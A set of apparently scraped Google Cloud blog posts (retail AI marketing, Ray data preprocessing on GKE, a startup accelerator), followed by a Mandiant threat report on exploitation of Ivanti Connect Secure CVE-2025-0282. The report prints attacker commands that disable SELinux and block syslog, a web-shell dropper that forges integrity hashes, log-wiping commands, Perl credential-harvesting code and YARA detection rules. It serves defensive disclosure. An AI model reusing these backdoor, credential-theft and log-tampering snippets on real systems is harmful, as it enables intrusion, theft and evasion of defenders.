“NVIDIA’s software on Google Cloud brings two of the best technology leaders together. NVIDIA’s easy-to-use NIM microservices, available on Google Cloud, are secure and reliable, and help deploy high-performance AI model inference more quickly and affordably. NVIDIA NIM microservices and GPUs on GKE accelerated LiveX AI Agent’s average answer/response generation speed by 6.1x, enabling real-time, human-like interactions for customer support, shopping assistance, and product education, boosting growth, retention and customer experience.” – Jia Li, Co-Founder, Chief AI Officer, LiveX AI
Improve responsiveness:AI techniques like text embedding and vector database help retailers make more relevant recommendations by using more data, but this can also slow the experience down. The in-house engineering and data science organization at a top-5 U.S. grocer collaborated with Google and NVIDIA to optimize models for better performance.
By using NVIDIA AI Enterprise software’s performance and caching improvements in its Vertex AI endpoint, the grocer cut inference time from several seconds to just 100 milliseconds — without changing the model. This now makes large-scale, real-time personalization possible. Learn more about the benefits of combining Google Cloud Vertex AI Platform andNVIDIA AI Enteprise software.
In-store analytics & innovation: AI is advancing how brick and mortar stores understand customer engagement, creating new opportunities to personalize the shopper journey. Standard.ai is accelerated by NVIDIA Metropolis, also available with NVIDIA AI Enterprise on the Google Cloud Marketplace, giving retailers and consumer goods precise visualization of customer journeys and creating actionable insights by real time analyzing factors such as dwell time, shopper orientation, proximity, and engagement with products, ads, and high-impact zones.
“The NVIDIA Metropolis platform and DeepStream software development kit have enabled us to seamlessly deploy our video pipelines across Google Cloud data centers and on-prem GPUs, and, in combination with model optimizations through the NVIDIA TensorRT ecosystem of application programming interfaces, we have cut our image preprocessing time to one-third, significantly reducing our infrastructure footprint.” – David Woolard, Chief Technology Officer, Standard.ai
Accelerate AI transformation
Influenced by the rapid advancements of AI, the retail landscape is evolving faster than ever. For retailers looking to stay on the cutting edge, the collaboration between Google Cloud and NVIDIA continues to offer access to the latest in AI models, infrastructure, platforms that ensure scalability, and development tools all in an environment that’s built on responsible AI practices and best-in-class security.
The exponential growth of machine learning models brings with it ever-increasing datasets. This data deluge creates a significant bottleneck in the Machine Learning Operations (MLOps) lifecycle, as traditional data preprocessing methods struggle to scale. The preprocessing phase, which is critical for transforming raw data into a format suitable for model training, can become a major roadblock to productivity.
To address this challenge, in this article, we propose a distributed data preprocessing pipeline that leverages the power of Google Kubernetes Engine (GKE), a managed Kubernetes service, and Ray, a distributed computing framework for scaling Python applications. This combination allows us to efficiently preprocess large datasets, handle complex transformations, and accelerate the overall ML workflow.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eaa72b0d460>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
The data preprocessing imperative
The data preprocessing phase in MLOps is foundational, directly impacting the quality and performance of machine learning models. Preprocessing includes tasks such as data cleaning, feature engineering, scaling, and encoding, all of which are essential for ensuring that models learn effectively from the data.
When data preprocessing requires a large number of operations, it may cause bottlenecks slowing down the overall speed at which the data is processed. In the following example, we walk through a preprocessing dataset use case that includes uploading several images to a Google Cloud Storage bucket. This involves up to 140,000 operations that, when executed serially, create a bottleneck and take over 8 hours to complete.
Dataset For this example, we use a pre-crawled dataset consisting of 20,000 products.
Data preprocessing steps The dataset has 15 different columns. The columns of our interest are: ‘uniq_id’, ‘product_name’, ‘description’, ‘brand’ ,‘product_category_tree’, ‘image’ ,‘product_specifications’.
Besides dropping null values and duplicates, we perform the following steps on the relevant columns:
description: Clean up Product Description by removing stop words and punctuation.
product_category_tree: Split into different columns.
product_specifications: Parse the Product Specifications into Key:Value pairs.
image: Parse the list of image urls. Validate the URL and download the image.
Now, consider the scenario where a preprocessing task involves extracting multiple image URLs from each row of a large dataset and uploading the images to a Cloud Storage bucket. This might sound straightforward, but with a dataset that contains 20,000+ rows, each with potentially up to seven URLs, the process can become incredibly time-consuming when executed serially in Python. In our experience, such a task can take upwards of eight hours to complete!
Solution: Implement parallelism for scalability
To tackle this scalability issue, we turn to parallelism. By breaking the dataset into smaller chunks and distributing the processing across multiple threads, we can drastically reduce the overall execution time. We chose to use Ray as our distributed computing platform.
Ray: Distributed computing simplified
Ray is a powerful framework designed for scaling Python applications and libraries. It provides a simple API for distributing computations across multiple workers, making it a strong choice for implementing parallel data preprocessing pipelines.
In our specific use case, we leverage Ray to distribute the Python function responsible for downloading images from URLs to Cloud Storage buckets across multiple Ray workers. Ray’s abstraction layer handles the complexities of worker management and communication, allowing us to focus on the core preprocessing logic.
Ray’s core capabilities include:
Task parallelism: Ray enables arbitrary functions to be executed asynchronously as tasks on separate Python workers, providing a straightforward way to parallelize our image download process.
Actor model: Ray’s “actors” offer a way to encapsulate stateful computations, making them suitable for complex preprocessing scenarios where shared state might be necessary.
Simplified scaling: Ray seamlessly scales from a single machine to a full-blown cluster, making it a flexible solution for varying data sizes and computational needs.
Implementation details
We ran the data preprocessing on GKE using the accelerated platforms repository, which provides the code to build your GKE cluster and configure pre-requisites like running Ray on the cluster so you can run data preprocessing on the cluster as a container. The job consisted of three phases:
1. Dataset partitioning: We divide the large dataset into smaller chunks.
The 20,000 rows of input data were divided into 101 smaller chunks, each with 199 rows. Each chunk is assigned to a Ray task, which is executed on a Ray worker.
2. Ray task distribution: We created Ray remote tasks. Ray creates and manages the workers and distributes the task onto them.
3. Parallel data processing: The Ray tasks prepare the data and download the images to Cloud Storage concurrently.
Results
By leveraging Ray and GKE, we achieved a dramatic reduction in processing time. The preprocessing time for 20,000 rows decreased from over 8 hours to just 17 minutes, representing a speedup of approximately 23x. If the data size increases, you can adjust the batch size and use Ray autoscaling to achieve similar performance.
Data preprocessing challenges no more
Distributed data preprocessing with GKE and Ray provides a robust and scalable solution for addressing the data preprocessing challenges faced by modern ML teams. By leveraging the power of parallelism and cloud infrastructure, we can accelerate data preparation, reduce bottlenecks, and empower data scientists and ML engineers to focus on model development and innovation. To learn more, run the deployment that demonstrates this data preprocessing use case using Ray on GKE cluster.
To help close this gender gap, we are opening up applications for the Google for Startups Accelerator: Women Founders program for Europe & Israel. This ten-week accelerator is designed to support Seed to Series A women-led AI startups with expert mentorship, technical support, and tailored workshops that lay the groundwork for scaling.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eaa72e83190>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Fostering a more inclusive AI ecosystem
As AI continues to revolutionize industries, ensuring that diverse voices lead the way is critical for driving innovation that benefits everyone. The Google for Startups Accelerator: Women Founders program is working to level the playing field, empowering women-led startups to bring fresh, diverse perspectives to the future of AI.
Margaryta Sivakova, the CEO of Legal Nodes, leveraged support from the program to scale her business:“Through Google for Startups Accelerator, we learned to build, improve, and scale AI solutions, focusing on production-grade AI, MLOps, and the right infrastructure for rapid scaling.”
Maria Terzi, the CEO of Malloc Privacy, received one-on-one support to help users protect their data on their phones:“We joined Google for Startups Accelerator to enhance our technology and gained much more—insights on pricing, sales, UI/UX design, people management, and fast-paced operations.”
Apply now
Women-led startups building with AI in Europe and Israel can apply until January 24 for the 2025 cohort of the Google for Startups Accelerator: Women Founders program.
Written by: John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson
Note: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more indicators, detections, and information to this blog post as needed.
On Wednesday, Jan. 8, 2025, Ivanti disclosed two vulnerabilities, CVE-2025-0282 and CVE-2025-0283, impacting Ivanti Connect Secure (“ICS”) VPN appliances. Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning mid-December 2024. CVE-2025-0282 is an unauthenticated stack-based buffer overflow. Successful exploitation could result in unauthenticated remote code execution, leading to potential downstream compromise of a victim network.
Ivanti and its affected customers identified the compromise based on indications from the company-supplied Integrity Checker Tool (“ICT”) along with other commercial security monitoring tools. Ivanti has been working closely with Mandiant, affected customers, government partners, and security vendors to address these issues. As a result of their investigation, Ivanti has released patches for the vulnerabilities exploited in this campaign and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Mandiant is currently performing analysis of multiple compromised Ivanti Connect Secure appliances from multiple organizations. The activity described in this blog utilizes insights collectively derived from analysis of these infected devices and have not yet conclusively tied all of the activity described below to a single actor. In at least one of the appliances undergoing analysis, Mandiant observed the deployment of the previously observed SPAWN ecosystem of malware (which includes the SPAWNANT installer, SPAWNMOLE tunneler and the SPAWNSNAIL SSH backdoor). The deployment of theSPAWN ecosystem of malware following the targeting of Ivanti Secure Connect appliances has been attributed to UNC5337, a cluster of activity assessed with moderate confidence to be part of UNC5221, which is further described in theAttribution section.
Mandiant has also identified previously unobserved malware families from additional compromised appliances, tracked as DRYHOOK and PHASEJAM that are currently not yet linked to a known group.
It is possible that multiple actors are responsible for the creation and deployment of these various code families (i.e. SPAWN, DRYHOOK and PHASEJAM), but as of publishing this report, we don’t have enough data to accurately assess the number of threat actors targeting CVE-2025-0282. As additional insights are gathered, Mandiant will continue to update this blog post.
Exploitation
While CVE-2025-0282 affects multiple patch levels of ICS release 22.7R2, successful exploitation is version specific. Prior to exploitation, repeated requests to the appliance have been observed, likely to determine the version prior to attempting exploitation.
Version detection has been observed using the Host Checker Launcher, shown above, and the different client installers to determine the version of the appliance. HTTP requests from VPS providers or Tor networks to these URLs, especially in sequential version order, may indicate pre-exploitation reconnaissance.
While there are several variations during the exploitation of CVE-2025-0282, the exploit and script generally performs the following steps:
Disable SELinux
Prevent syslog forwarding
Remount the drive as read-write
Write the script
Execute the script
Deploy one or more web shells
Use sed to remove specific log entries from the debug and application logs
Reenable SELinux
Remount the drive
Immediately after exploitation the threat actor disables SELinux, uses iptables to block syslog forwarding, and remounts the root partition to enable writing of malware to the appliance.
setenforce 0
iptables -A OUTPUT -p udp --dport 514 -j DROP
iptables -A OUTPUT -p tcp --dport 514 -j DROP
iptables -A OUTPUT -p udp --dport 6514 -j DROP
iptables -A OUTPUT -p tcp --dport 6514 -j DROP
mount -o remount,rw /
Malware Staging
Mandiant observed the threat actor using the shell script to echo a Base64-encoded script into the /tmp/.t, and then set execution permissions on the file. The figure below shows the contents of /tmp/.t.
Next, the threat actor writes a Base-64 encoded ELF binary into /tmp/svb. The ELF binary first uses setuid to set the owner of the process to root. It then executes /tmp/s (PHASEJAM) which would inherit the root privileges of the parent process. The threat actor then uses dd to overwrite the svb file with zeros, and removes /tmp/.t.
PHASEJAM is a dropper written as a bash shell script that maliciously modifies Ivanti Connect Secure appliance components. The primary functions of PHASEJAM are to insert a web shell into the getComponent.cgi and restAuth.cgi files, block system upgrades by modifying the DSUpgrade.pm file, and overwrite the remotedebug executable so that it can be used to execute arbitrary commands when a specific parameter is passed.
Web Shell
PHASEJAM inserts the web shell into the legitimate files getComponent.cgi and restAuth.cgi as a function named AccessAllow(). The web shell is Perl-based and provides the threat actor with remote access and code execution capabilities on the compromised ICS server. It utilizes the MIME::Base64 module to encode and decode commands and data.
The table below summarizes the web shell’s functionality, accessible via specific commands derived from HTTP query parameters:
Command
Description
1
Decodes the code provided in the HTTP_CODE environment variable and writes the result into a file named test.p under the /tmp directory. Executes the file using /bin/bash and returns the output of the command execution to the attacker.
2
Similar to command 1 but executes the provided commands using /home/bin/dsrunpriv and the patched remotedebug file.
3
Writes a file with a name specified in the HTTP_CODE environment variable under the /tmp directory with content provided in the License parameter. This functionality allows the attacker to upload arbitrary files on the compromised appliance.
4
Reads the content of a file specified in the Base64-decoded HTTP_CODE environment variable and returns the content to the attacker. This enables the attacker to exfiltrate data from the affected appliance.
5
Similar to command 3 but overwrites the target file instead of appending to it, in case it already exists on the appliance.
Blocked and Simulated Upgrades
To intercept upgrade attempts and simulate an upgrade, PHASEJAM injects a malicious function into the /home/perl/DSUpgrade.pm file named processUpgradeDisplay(). The functionality is intended to simulate an upgrading process that involves thirteen steps, with each of those taking a predefined amount of time. If the ICS administrator attempts an upgrade, the function displays a visually-convincing upgrade process that shows each of the steps along with various numbers of dots to mimic a running process. Further details are provided in the System Upgrade Persistence section.
remotedebug Hooking
PHASEJAM renames the file /home/bin/remotedebug to remotedebug.bak. PHASEJAM writes a new /home/bin/remotedebug shell script to hook calls to remotedebug. The brief shell script checks for a new -c parameter that allows remote code execution by the web shell. All other parameters are passed through to remotedebug.bak.
The following provides an abridged PHASEJAM Sample:
# create backdoor 1
cp /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/webserver/htdocs/dana-na/jam/getComponent.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/jam/getComponent.cgi
sh=$(echo CnN1YiB...QogICAK|base64 -d)
up=$(echo CnN1YiB...xuIjsKCn0K |base64 -d)
grep -q 'sub AccessAllow()' || echo "$sh" >>
/home/webserver/htdocs/dana-na/jam/getComponent.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/jam/getComponent.cgi
/home/etc/manifest/manifest -a |grep
-oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/webserver/htdocs/dana-na/jam/getComponent.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# create backdoor 2
cp /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/webserver/htdocs/dana-na/auth/restAuth.cgi.bak
sed -i 's/sub main {/sub main {my $r7=AccessAllow();return if
$r7;/g' /home/webserver/htdocs/dana-na/auth/restAuth.cgi
grep -q 'sub AccessAllow()' echo "$sh" >>
/home/webserver/htdocs/dana-na/auth/restAuth.cgi
sed -i "s/$(grep /home/webserver/htdocs/dana-na/auth/restAuth.cgi
/home/etc/manifest/manifest -a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl
dgst -sha256 /home/webserver/htdocs/dana-na/auth/restAuth.cgi |grep
-oE '[0-9a-f]{64}')/g" /home/etc/manifest/manifest;
#pkill cgi-server
# remotedebug
cp -f /home/bin/remotedebug /home/bin/remotedebug.bak
echo IyEvYmluL2Jhc2gKaWYgWyAiJDEiID09ICItYyIgXTsgdGhlbgoJYm
FzaCAiJEAiCmVsc2UKCWV4ZWMgL2hvbWUvYmluL3JlbW90ZWRlYnV
nLmJhayAiJEAiCmZpICAK|base64 -d >/home/bin/remotedebug
chmod 777 /home/bin/remotedebug.bak
sed -i "s/$(grep /home/bin/remotedebug /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/bin/remotedebug |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
# upgrade
cp -f /home/perl/DSUpgrade.pm /home/perl/DSUpgrade.pm.bak
sed -i 's/popen(*FH, $prog);/processUpgradeDisplay($prog,
$console, $html);return 0;popen(*FH, $prog);/g'
/home/perl/DSUpgrade.pm
grep -q 'sub processUpgradeDisplay()' || echo "$up" >>
/home/perl/DSUpgrade.pm
sed -i "s/$(grep /home/perl/DSUpgrade.pm /home/etc/manifest/manifest
-a |grep -oE '[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
pkill cgi-server
Anti-Forensics
Following exploitation, the threat actor has been observed removing evidence of exploitation from several key areas of the appliance:
Clearing kernel messages using dmesg and removing entries from the debug logs that are generated during the exploit
Deleting troubleshoot information packages (state dumps) and any core dumps generated from process crashes
Removing log application event log entries related to syslog failures, internal ICT failures, crash traces, and certificate handling errors
Removing executed commands from the SELinux audit log
dmesg -C
cd /data/var/dlogs/
sed -i '/segfault/d' debuglog
sed -i '/segfault/d' debuglog.old
sed -i '/SystemError/d' debuglog
sed -i '/SystemError/d' debuglog.old
sed -i '/ifttls/d' debuglog
sed -i '/ifttls/d' debuglog.old
sed -i '/main.cc/d' debuglog
sed -i '/main.cc/d' debuglog.old
sed -i '/SSL_read/d' debuglog
sed -i '/SSL_read/d' debuglog.old
sed -i '/tlsconnectionpoint/d' debuglog
sed -i '/tlsconnectionpoint/d' debuglog.old
rm -rf /data/var/statedumps/*
rm -rf /data/var/cores/*
cd /home/runtime/logs
sed -i 's/[^x00]{1}x00[^x00]*web server[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*AUT24604[^x00]*x00//g' log.events.vc0
sed -i 's/[^x00]{1}x00[^x00]*SYS31048[^x00]*x00//g' log.events.vc0
sed -i 's/[^x01]{1}x01[^x01]*SYS31376[^x01]*x01//g' log.events.vc0
sed -i 's/x01[^x01]{2,3}6[^x01]*ERR10073[^xff]*x09[^x01]{1}x01/
x01/g' log.events.vc0
cd /data/var/log/audit/
sed -i '/bin/web/d' audit.log
sed -i '/setenforce/d' audit.log
sed -i '/mount/d' audit.log
sed -i '/bin/rm/d' audit.log
System Upgrade Persistence
Mandiant identified two techniques the threat actor employed to persist across system upgrades on compromised Ivanti Connect Secure appliances.
Fake System Upgrades
The first technique, utilized by PHASEJAM, prevents legitimate ICS system upgrade attempts by administrators via rendering a fake HTML upgrade progress bar while silently blocking the legitimate upgrade process. Due to the blocked upgrade attempt, the technique would allow any installed backdoors or tools left by the threat actor to persist on the current running version of the VPN while giving the appearance of a successful upgrade.
First, the threat actor uses sed to insert a malicious Perl code into DSUpgrade.pm to modify the behavior of the system upgrade process. The malicious processUpgradeDisplay() function, which is stored in the shell variable $up, is appended to DSUpgrade.pm.
The modification occurs within a function in DSUpgrade.pm responsible for installing the new upgrade package. The inserted call to processUpgradeDisplay() with the early return makes the legitimate popen() call to execute /pkg/dspkginstall unreachable. The following provides the relevant excerpt from DSUpgrade.pm as a result of the modification.
local *FH;
my $prog = "/pkg/dspkginstall /var/tmp/new-pack.tgz";
if (defined $useUpgradePartition && $useUpgradePartition == 1) {
$prog = "/pkg/dspkginstall /data/upgrade/new-pack.tgz";
}
processUpgradeDisplay($prog, $console, $html);
return 0;
popen(*FH, $prog);
The modification intercepts the standard upgrade flow by calling the maliciously created processUpgradeDisplay() function before the legitimate upgrade command executes. The figure below provides an excerpt of the inserted processUpgradeDisplay() function that displays a fake HTML upgrade progress bar, using the sleep command to add dots every second to mimic a running process.
Recent versions of Ivanti Connect Secure have a built-in integrity checker tool (ICT) that periodically scans the file system to detect new or modified system files that may be indicative of system compromise. The ICT uses a manifest during its scanning process,containing a list of the expected file paths on the system along with its expected SHA256 hash. In an attempt to circumvent the ICT scanner, the threat actor recalculates the SHA256 hash of the modified DSUpgrade.pm and inserts it into the manifest.
sed -i "s/$(grep /home/perl/DSUpgrade.pm
/home/etc/manifest/manifest -a |grep -oE
'[0-9a-f]{64}')/$(/home/bin/openssl dgst -sha256
/home/perl/DSUpgrade.pm |grep -oE '[0-9a-f]{64}')/g"
/home/etc/manifest/manifest;
The threat actor copies the VERSION file from the mounted upgrade partition (tmp/root/home/VERSION) to the current version partition (/home/VERSION). As a result, the system falsely indicates a successful upgrade while continuing to run on the old appliance version.
SPAWNANT and its supporting components can persist across system upgrades. It hijacks the execution flow of dspkginstall, a binary used during the system upgrade process, by exporting a malicious snprintf function containing the persistence mechanism.
Unlike the first method described in this blog post for system upgrade persistence, SPAWNANT does not block the upgrade process. It survives the upgrade process by ensuring itself and its components are migrated to the new upgrade partition (mounted on /tmp/data/ during a legitimate system upgrade process).
SPAWNANT sets the LD_PRELOAD environment variable to itself (libupgrade.so) within DSUpgrade.pm on the upgrade partition. The modification tells the dynamic linker to load libupgrade.so and use SPAWNANT’s malicious exported snprintf function before other libraries.
ENV{“LD_PRELOAD”} = “libupgrade.so”
Next, SPAWNANT establishes an additional method of backdoor access by writing a web shell into compcheckresult.cgi on the upgrade partition. The web shell uses system() to execute the value passed to a hard-coded query parameter. The following provides the relevant excerpt of the inserted web shell.
Throughout this entire process, SPAWNANT is careful to circumvent the ICT by recalculating the SHA256 hash for any maliciously modified files. Once the appropriate modifications are complete, SPAWNANT generates a new RSA key pair to sign the modified manifest.
After establishing an initial foothold on an appliance, Mandiant observed a number of different tunnelers, including the use of publicly-available and open-source tunnelers, designed to facilitate communication channels between the compromised appliance and the threat actor’s command and control infrastructure. These tunnelers allowed the attacker to bypass network security controls and may enable lateral movement further into a victim environment.
SPAWNMOLE
Originally reported in Cutting Edge, Part 4, SPAWNMOLE is a tunneler injected into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. SPAWNMOLE is activated when it detects a specific series of magic bytes. Otherwise, the remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer.
LDAP Queries
The threat actor used several tools to perform internal network reconnaissance. This includes using built-in tools included on the ICS appliance such as nmap and dig to determine what can be accessed from the appliance. The threat actor has also been observed using the LDAP service account, if configured, from the ICS appliance to perform LDAP queries. The LDAP service account was also observed being used to move laterally within the network, including Active Directory servers, through SMB or RDP. The observed attacker commands were prefaced by the following lines:
LDAP queries were executed using /tmp/lmdbcerr, with output directed to randomly named files in the /tmp directory. Password, host, and query were passed as command line arguments.
Mandiant has observed the threat actor archiving the database cache on a compromised appliance and staging the archived data in a directory served by the public-facing web server to enable exfiltration of the database. The database cache may contain information associated with VPN sessions, session cookies, API keys, certificates, and credential material.
The threat actor archives the contents of /runtime/mtmp/lmdb. The resulting tar archive is then renamed and masquerades itself as a CSS file located within /home/webserver/htdocs/dana-na/css/.
Ivanti has previously published guidance on remediating the risk that may result from the database cache dump. This includes resetting local account credentials, resetting API keys, and revoking certificates.
Credential Harvesting
Mandiant has observed the threat actor deploying a Python script, tracked as DRYHOOK, to steal credentials. The malware is designed to modify a system component named DSAuth.pm that belongs to the Ivanti Connect Secure environment in order to harvest successful authentications.
Upon execution, the malicious Python script opens /home/perl/DSAuth.pm and reads its content in a buffer. Next, the malware uses regular expressions to find and replace the following lines of code:
The *setPrompt value above is replaced with the following Perl code:
# *setPrompt
$ds_g="";
sub setPrompt{
eval{
my $res=@_[1]."=".@_[2]."n";
$ds_g .= $res;
};
return DSAuthc::RealmSignin_setPrompt(@_);
}
$ds_e="";
The injected setPrompt routine captures the second and the third parameter, combines them into the format <param2>=<param3> and then assigns the produced string to a global variable named $ds_g. The next replacement, shown as follows, reveals that the second parameter is a username, and the third parameter is the password of a user trying to authenticate.
# *runSignin = *DSAuthc::RealmSignin_runSignin;
$ds_g1="";
sub encode_base64 ($;$)
{
my $res = "";
my $eol = $_[1];
$eol = "n" unless defined $eol;
pos($_[0]) = 0; # ensure start at the beginning
$res = join '', map( pack('u',$_)=~ /^.(S*)/, ($_[0]=~/(.{1,45})/gs));
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
return $res;
}
sub runSignin{
my $res=DSAuthc::RealmSignin_runSignin(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e1="";
The code above contains two subroutines named encode_base64 and runSignin. The former takes a string and Base64 encodes it, while the latter intercepts the sign-in process and upon a successful attempt serializes the saved credentials into the global variable $ds_g username and password in a file named cmdmmap.kuwMW under the /tmp directory. The <username>=<password> string is first RC4 encrypted with a hard-coded key and then Base64 encoded with the encode_base64 routine before being saved into the cmdmmap.kuwMW file.
The last code replacement is shown as follows, and it is the same code as above, but it targets a different sign-in scheme that is named EBSL in the code.
# *runSigninEBSL
$ds_g2="";
sub runSigninEBSL{
my $res=DSAuthc::RealmSignin_runSigninEBSL(@_);
if(@_[1]->{status} != $DSAuth::Reject &&
@_[1]->{status} != $DSAuth::Restart){
if($ds_g ne ""){
use Crypt::RC4;
CORE::open(FH,">>/tmp/cmdmmap.kuwMW");
my $dd=RC4("redacted",$ds_g);
print FH encode_base64($dd)."n";
CORE::close(FH);
$ds_g = "";
}
}
elsif(@_[1]->{status} == $DSAuth::Reject ||
@_[1]->{status} == $DSAuth::Restart){
$ds_g = "";
}
return $res;
}
$ds_e2="";
After the changes are made, the malware attempts to write the modified content back to the DSAuth.pm file, and if unsuccessful, it will remount the file system as readwrite, write the file, and then mount the file system as readonly again. Finally, all instances of the cgi-server process are killed in order for the modified DSAuth.pm to be activated.
Attribution
Mandiant has previously only observed the deployment of the SPAWN ecosystem of malware on Ivanti Connect Secure appliances by UNC5337. UNC5337 is a China-nexus cluster of espionage activity including operations that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024 and most recently as Dec. 2024. This included the Jan 2024 exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) to compromise Ivanti Connect Secure appliances. UNC5337 then leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is part of UNC5221.
UNC5221 is a suspected China-nexus espionage actor that exploited vulnerabilities CVE-2023-46805 and CVE-2024-21887, which impacted Ivanti Connect Secure VPN and Ivanti Policy Security appliances as early as December 2023. Following the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection), UNC5221 leveraged multiple custom malware families, including the ZIPLINE passive backdoor, THINSPOOL dropper, LIGHTWIRE web shell, and WARPWIRE credential harvester. UNC5221 was also observed leveraging the PySoxy tunneler and BusyBox to enable post-exploitation activity. Additionally, Mandiant previously observed UNC5221 leveraging a likely ORB network of compromised Cyberoam appliances to enable intrusion operations.
Conclusion
Following the Jan. 10, 2024, disclosure of CVE-2023-46805 and CVE-2024-21887, Mandiant observed widespread exploitation by UNC5221 targeting Ivanti Connect Secure appliances across a wide range of countries and verticals. Mandiant assesses that defenders should be prepared for widespread, opportunistic exploitation, likely targeting credentials and the deployment of web shells to provide future access. Additionally, if proof-of-concept exploits for CVE-2025-0282 are created and released, Mandiant assesses it is likely additional threat actors may attempt targeting Ivanti Connect Secure appliances.
Recommendations
Ivanti recommends utilizing their external and internal Integrity Checker Tool (“ICT”) and to contact Ivanti Support if suspicious activity is identified. While Mandiant has observed threat actor attempts to evade detection by the ICT, the following screenshots provide examples of how a successful scan should appear versus an unsuccessful scan on a device that has been compromised. Note the number of steps reported by the output.
Ivanti also notes that the ICT is a snapshot of the current state of the appliance and cannot necessarily detect threat actor activity if they have returned the appliance to a clean state. The ICT does not scan for malware or other Indicators of Compromise. Ivanti recommends that customers should run the ICT in conjunction with other security monitoring tools which have detected post-exploitation activity.
If the ICT result shows signs of compromise, Ivanti recommends a factory reset on the appliance to ensure any malware is removed and to then place the appliance back into production using version 22.7R2.5.
Acknowledgement
We would like to thank the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE.
Indicators of Compromise (IOCs)
To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a publicly available GTI Collection.
rule M_APT_Installer_SPAWNSNAIL_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH
backdoor targeting Ivanti devices. It has an ability to inject a specified
binary to other process, running local SSH backdoor when injected to
dsmdm process, as well as injecting additional malware to dslogserver"
md5 = "e7d24813535f74187db31d4114f607a1"
strings:
$priv = "PRIVATE KEY-----" ascii fullword
$key1 = "%d/id_ed25519" ascii fullword
$key2 = "%d/id_ecdsa" ascii fullword
$key3 = "%d/id_rsa" ascii fullword
$sl1 = "[selinux] enforce" ascii fullword
$sl2 = "DSVersion::getReleaseStr()" ascii fullword
$ssh1 = "ssh_set_server_callbacks" ascii fullword
$ssh2 = "ssh_handle_key_exchange" ascii fullword
$ssh3 = "ssh_add_set_channel_callbacks" ascii fullword
$ssh4 = "ssh_channel_close" ascii fullword
condition:
uint32(0) == 0x464c457f and $priv and any of ($key*)
and any of ($sl*) and any of ($ssh*)
}
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_APT_Tunneler_SPAWNMOLE_1
{
meta:
author = "Mandiant"
description = "Detects a specific comparisons in SPAWNMOLE
tunneler, which allow malware to filter put its own traffic .
SPAWNMOLE is a tunneler written in C and compiled as an ELF32
executable. The sample is capable of hijacking a process on the
compromised system with a specific name and hooking into its
communication capabilities in order to create a proxy server for
tunneling traffic."
md5 = "4f79c70cce4207d0ad57a339a9c7f43c"
strings:
/*
3C 16 cmp al, 16h
74 14 jz short loc_5655C038
0F B6 45 C1 movzx eax, [ebp+var_3F]
3C 03 cmp al, 3
74 0C jz short loc_5655C038
0F B6 45 C5 movzx eax, [ebp+var_3B]
3C 01 cmp al, 1
0F 85 ED 00 00 00 jnz loc_5655C125
*/
$comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]
3C 01 0F 85 }
/*
81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h
